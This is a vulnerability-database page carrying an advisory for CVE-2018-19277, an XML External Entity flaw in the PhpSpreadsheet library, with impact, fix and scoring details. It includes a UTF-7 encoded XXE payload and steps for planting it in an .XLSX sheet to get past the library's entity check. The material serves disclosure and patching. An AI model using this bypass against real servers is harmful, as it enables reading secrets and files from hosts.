Vulners
Lucene search
PhpSpreadsheet < 1.5.0 - XML External Entity (XXE)
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | PhpSpreadsheet < 1.5.0 - XML External Entity (XXE) Vulnerability | 24 Dec 201800:00 | – | zdt |
 | PhpSpreadsheet XML External Entity Injection (CVE-2018-19277) | 3 Jan 201900:00 | – | checkpoint_advisories |
 | CVE-2018-19277 | 14 Nov 201811:00 | – | cve |
 | CVE-2018-19277 | 14 Nov 201811:00 | – | cvelist |
 | Loft Data Grids - Moderately critical - XML External Entity (XXE) Processing - SA-CONTRIB-2021-043 | 13 Oct 202100:00 | – | drupal |
 | EUVD-2019-0766 | 7 Oct 202500:30 | – | euvd |
 | PhpSpreadsheet 1.5.0 - XML External Entity (XXE) | 30 Nov 201800:00 | – | exploitpack |
 | XXE Vulnerability | 22 Nov 201823:07 | – | friendsofphp |
| XXE Vulnerability | 20 Nov 201819:50 | – | friendsofphp |
 | XXE in PHPSpreadsheet due to encoding issue | 20 Nov 201901:38 | – | github |
10
# Product Description
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.
# Vulnerabilities List
One vulnerability was identified within the PhpSpreadsheet library.
# Affected Version
Versions <=1.5.0
# Solution
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.
This vulnerability is described in the following section.
# XML External Entity (XXE) Injection
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.
# Vulnerability Details
CVE ID: CVE-2018-19277
Access Vector: Network
Security Risk: High
Vulnerability: CWE-611
CVSS Base Score: 7.7
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:
```
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
```
The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.
When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Nov 2018 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 26.8
CVSS 3.18.8
EPSS0.02992